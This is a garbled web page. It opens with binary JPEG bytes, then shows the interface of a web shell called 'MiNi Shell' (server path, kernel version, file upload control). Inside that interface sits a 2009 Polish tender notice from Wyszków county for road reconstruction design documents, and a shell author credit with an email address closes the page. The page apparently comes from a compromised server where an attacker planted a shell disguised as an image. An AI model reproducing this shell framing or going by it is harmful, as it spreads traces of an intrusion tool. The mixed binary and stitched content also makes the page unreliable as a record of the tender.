JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090212/25774-N-2009.html

<p class="kh_header"><b>Wyszków: Dokumentacja projektowa przebudowy drogi powiatowej Nr 4408W 
- ul. I AWP na odcinku od ul. Pułtuskiej do ul. Prostej i od ul. Komunalnej do ul. Sosnowej</b><br>
<b>Numer ogłoszenia: 25774 - 2009; data zamieszczenia: 12.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Wyszkowskiego , al. Róż 2, 07-200 Wyszków, woj. mazowieckie, tel. 029 7420750, faks (029) 742 25 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-wyszkowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dokumentacja projektowa przebudowy drogi powiatowej Nr 4408W 
- ul. I AWP na odcinku od ul. Pułtuskiej do ul. Prostej i od ul. Komunalnej do ul. Sosnowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot opracowania projektowego.
Przedmiotem niniejszego zamówienia jest wykonanie dokumentacji projektowej  przebudowy drogi powiatowej Nr 4408W - ul. I AWP od ul. Pułtuskiej do ul. Prostej i od ul. Komunalnej do ul. Sosnowej.
Wspólny Słownik Zamówień (CPV) -  71.32.00.00.7 - usługi inżynieryjne w zakresie projektowania.
2. Zakres opracowania
Zakres dokumentacji projektowej i Specyfikacji Technicznej Wykonania i Odbioru Robót  przebudowy ulicy I AWP w Wyszkowie na odcinku od ul. Pułtuskiej do ul. Prostej i od ul. Komunalnej do ul. Sosnowej obejmuje:
1) Przebudowę istniejącej nawierzchni bitumicznej jezdni.
2) Przebudowę istniejących przepustów pod drogą.
3) Przebudowę chodników na ciągi piesze i pieszo-rowerowe na całej długości.
4) Budowę nowych chodników na odcinku od ul. Sosnowej do ul. Komunalnej.
5) Budowę zatok autobusowych.
6) Budowę koniecznych elementów odwodnienia powierzchniowego.
7) Budowę elementów uspokojenia ruchu - elementy spowalniające, azyle na przejściach dla pieszych w najbardziej niebezpiecznych miejscach.
8) Przebudowę urządzeń nie związanych z gospodarką drogową.
9) Budowę kanalizacji deszczowej na odcinku od ul. Komunalnej do ul. Sosnowej.
10) Przebudowę (w niezbędnym zakresie) kanalizacji deszczowej na odcinku od ul. Pułtuskiej do ul. Prostej.
11) Wycinkę drzew w zakresie niezbędnym dla realizacji inwestycji i zagospodarowanie zielenią.
12) Wykonanie nowej sygnalizacji świetlnej na skrzyżowaniu z ul. Pułtuską.
13) Przebudowę linii energetycznej napowietrznej na kablową wraz z przyłączami na odcinku od ul. Pułtuskiej do ul. Prostej.
14) Przebudowę oświetlenia ulicy na odcinku od ul. Pułtuskiej do ul. Prostej.
15) Przebudowę istniejącej napowietrznej sieci telekomunikacyjnej na podziemną sieć kablową, na odcinku od ul. Pułtuskiej do ul. Prostej.
3. Skład dokumentacji projektowej
W skład zamawianej dokumentacji projektowej dla przebudowy ul. I AWP na odcinku od ul. Prostej do ul. Pułtuskiej i od ul. Komunalnej do ul. Sosnowej wchodzą następujące elementy: 
1) projekt koncepcyjny opracowany w zakresie drogowym, składający się z części graficznej i opisowej,
2) wykonanie odpowiednich map do celów projektowych,
3) projekt budowlany i wykonawczy:  przebudowy jezdni ulicy, przebudowy przepustów, budowy zatok autobusowych, budowy ciągów pieszych i pieszo-rowerowych oraz elementów uspokojenia ruchu budowy kanalizacji deszczowej (odcinek od ul. Komunalnej do ul. Sosnowej), niezbędnej przebudowy kanalizacji deszczowej na pozostałym odcinku, przebudowy linii energetycznej napowietrznej na kablową, przebudowy oświetlenia ulicy, przebudowy sieci telekomunikacyjnej napowietrznej na kablową, projekt nowej sygnalizacji świetlnej na skrzyżowaniu z ul. Pułtuską,  przebudowy wszelkich kolizji z istniejącymi sieciami uzbrojenia terenu, 
Uwaga:
1) Projekt kanalizacji deszczowej na odcinku od ul. Sosnowej do ul. Komunalnej należy wykonać w oparciu o istniejące już: projekt koncepcyjny kanalizacji deszczowej i projekt kanalizacji sanitarnej opracowane przez Gminę Wyszków. Na odcinku - skrzyżowanie z ul. Pułtuską - należy zaprojektować przebudowę kolektora istniejącej kanalizacji deszczowej.
2) Dokumentacja projektowa odcinka od ul. Sosnowej do ul. Komunalnej w zakresie drogowym wymagać będzie uzgodnienia przejścia przez przejazd linii kolejowej  nr 29 z PKP PLK S. - Zakład Linii Kolejowych w Siedlcach.
4) projekt wykonawczy stałej organizacji ruchu,
5) projekt robót zieleni.
6) przedmiar robót sporządzony z podziałem na charakterystyczne etapy robót, nazwami i kodem według wspólnego słownika zamówień CPV (zgodnie z rozporządzeniem Ministra Infrastruktury z 2 września 2004 r. Dz. U. Nr 202, poz. 2072).
7) kosztorys inwestorski sporządzony z podziałem na charakterystyczne etapy robót- zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. (Dz. U. Nr 130, poz. 1389).
8) Specyfikacje Techniczne Wykonania i Odbioru Robót, zgodnie z rozporządzeniem Ministra Infrastruktury z 2 września 2004 r. (Dz. U. Nr 202, poz. 2072). 
9) wykonanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (bioz) zgodnie z rozporządzeniem Ministra  Infrastruktury z dnia 23 czerwca 2003 r. (Dz. U. Nr 120, poz. 1126).
10) oświadczenie o kompletności dokumentacji oraz że jest zweryfikowana i posiada odpowiednie uzgodnienia.
11) karta informacyjna przedsięwzięcia, o której mowa w art. 3, ust. 1, pkt 5 i art. 74,ust. 1, pkt 2 ustawy z dnia 3 października 2008 r. (Dz. U. Nr 199, poz. 1227).
Uwaga:
Dokumentacja stanowiąca przedmiot zamówienia powinna być wykonana przez osoby posiadające odpowiednie, wymagane przepisami, uprawnienia.
Opracowana dokumentacja powinna zawierać wszelkie niezbędne rozwiązania projektowe i uzgodnienia umożliwiające Zamawiającemu uzyskanie pozwolenia na budowę lub zgodę na wykonywanie robót budowlanych.
Wszelkie pomiary ruchu, ekspertyzy i badania niezbędne dla potrzeb opracowania projektowego Wykonawca wykona we własnym zakresie.
Dokumentacja powinna uwzględniać zabezpieczenie i przebudowę kolidujących urządzeń infrastruktury technicznej i sieci uzbrojenia terenu.
Mapy z istniejącym uzbrojeniem terenu, znajdującym się w pasie drogowym planowanej inwestycji, znajdują się  na załączniku Nr 5 i Nr 6 do SIWZ.
Przed wykonaniem ostatecznej dokumentacji projektowej Wykonawca przedstawi Zamawiającemu do uzgodnienia i zatwierdzenia projekt koncepcyjny opracowany w zakresie drogowym.
Na dokumentację składa się:
- projekt budowlany (techniczny) wraz ze wszystkimi wymaganymi uzgodnieniami - 
  w 5 egzemplarzach,
- branżowe projekty wykonawcze - w 4 egzemplarzach. 
- specyfikacje techniczne wykonania i odbioru robót - w 2 egzemplarzach,
- przedmiary robót - w 2 egzemplarzach, 
- kosztorysy inwestorskie - w 2 egzemplarzach,
- karta informacyjna przedsięwzięcia - w 3 egzemplarzach (+ 1 wersja elektroniczna),
- komplet dokumentacji projektowej w wersji elektronicznej w postaci plików odczytywanych przez powszechnie stosowane programy - w 1 egzemplarzu.
4. Założenia do projektowania:
Ulica I Armii Wojska Polskiego jest drogą kategorii powiatowej. Posiada wszystkie skrzyżowania z drogami gminnymi oraz przejście przez tory linii kolejowej nr 29. 
Jezdnia posiada nawierzchnię bitumiczną. Istniejące chodniki wykonane są z płytek betonowych lub posiadają nawierzchnię bitumiczną.
W pasie drogowym ulicy znajdują się sieci uzbrojenia technicznego:
- kanalizacja sanitarna,
- kanalizacja deszczowa,
- gazowa,
- telefoniczna - napowietrzna i podziemna,
- energetyczna SN- napowietrzna,
- monitoringu - napowietrzna.
Niwelety przebudowywanej jezdni, chodników i ciągów pieszo-rowerowych należy w miarę możliwości dostosować do warunków istniejących. 
Chodniki i ciągi pieszo-rowerowe należy zaprojektować w miarę możliwości po śladach istniejących już chodników i ciągów, z kostki betonowej gr. 6 cm. 
Konstrukcja zjazdów wykonana z kostki betonowej gr. 8 cm. 
Zjazdy wysokościowo należy kształtować z zachowaniem spadku umożliwiającego wyprowadzenie wód z terenu posesji na jezdnię.  
Nawierzchnia ulicy z asfaltobetonu, odpowiednio do kategorii natężenia ruchu.
Odprowadzenie wód opadowych do istniejącej sieci kanalizacji deszczowej w ulicy (od ul. Pułtuskiej do ul. Prostej), natomiast na odcinku od ul. Komunalnej do ul. Sosnowej odprowadzenie wód deszczowych do zaprojektowanej kanalizacji deszczowej.
Uwaga:
Przyjęte rozwiązania projektowe i zastosowane materiały powinny maksymalnie ograniczać koszty przyszłej inwestycji, jednocześnie jednak powinny być zgodne z obowiązującymi przepisami i zasadami wiedzy technicznej.
5. Na etapie projektowania Wykonawca zobowiązany będzie do:
a) udziału w naradach zwoływanych w miarę potrzeb przez Zamawiającego,
b) terminowego wykonania poszczególnych elementów zamówienia,
c) uzgodnienia z Zamawiającym ostatecznej wersji przedmiotu zamówienia najpóźniej na 1 miesiąc przed upływem  terminu umownego określonego w części IV pkt 2 SIWZ.
6. W ramach nadzoru autorskiego Wykonawca zobowiązany będzie do:
a) czuwania w toku realizacji robót budowlanych nad zgodnością rozwiązań technicznych, materiałowych i użytkowych z dokumentacja techniczną. W przypadku złożenia przez oferenta, w trakcie procedury udzielenia zamówienia na roboty budowlane, ofert równoważnych (czyli zastosowania materiałów i urządzeń o parametrach nie gorszych niż przedstawienie w dokumentacji technicznej) lub wariantowych - kontrolowania parametrów tych materiałów i urządzeń,
b) uzupełniania szczegółów dokumentacji technicznej oraz wyjaśniania wykonawcy robót budowlanych wątpliwości, powstałych w toku realizacji tych robót,
c) udziału w naradach technicznych w miarę potrzeby na wezwanie Zamawiającego,
d) udziału w odbiorze poszczególnych istotnych części robót budowlanych oraz odbiorze końcowym inwestycji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu o udzielenie zamówienia publicznego mogą wziąć udział Oferenci, którzy:
a) posiadają uprawnienia do wykonywania działalności lub czynności odpowiadającym przedmiotowi zamówienia;
b) posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawiamy pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego w oparciu o art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu nastąpi poprzez analizę dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, metodą spełnia - nie spełnia.
Wykaz dokumentów, na podstawie których zostanie dokonana ocena spełnienia warunków  udziału w postępowaniu zawiera rozdz. VI SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca wraz z ofertą składa następujące oświadczenia lub dokumenty:
1. Dokumenty wymagane:
1.1 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed  upływem terminu składania ofert*,
1.2 oświadczenie o spełnieniu warunków wynikających z art. 22 ust.1 ustawy Prawo zamówień publicznych -  załącznik Nr 2 do SIWZ,
1.3 wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, tj. osób i podmiotów odpowiedzialnych za realizację zamówienia wraz z danymi na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także z określeniem  zakresu wykonywanych przez nich czynności. (załącznik Nr 3 do SIWZ),
2. Wykonawca zamieszkały poza terenem Rzeczpospolitej Polskiej.
2.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej zamiast dokumentów wymienionych w pkt 1.1.  niniejszego rozdziału, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub  miejsce zamieszkania potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
- nie  orzeczono wobec niego zakazu ubiegania się o zamówienie, 
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne  i  zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.2. Jeżeli w kraju pochodzenia osoby lub w kraju , w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2.1., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby  lub  kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
3. Dokumenty wymagane w przypadku składania oferty wspólnej.
W przypadku złożenia oferty przez konsorcjum / spółkę cywilną  warunki określone w rozdziale VI specyfikacji pkt. 1.3 muszą spełniać łącznie wszyscy uczestnicy konsorcjum  spółki cywilnej.
* dokumenty z tym znakiem winny być przedstawione przez każdego wykonawcę, w przypadku Wykonawców występujących wspólnie, na podstawie art. 23 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-wyszkowski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wyszkowie, Aleja Róż 2, 07-200 Wyszków, pok. 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Wyszkowie, Aleja Róż 2, 07-200 Wyszków, pok. 39.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com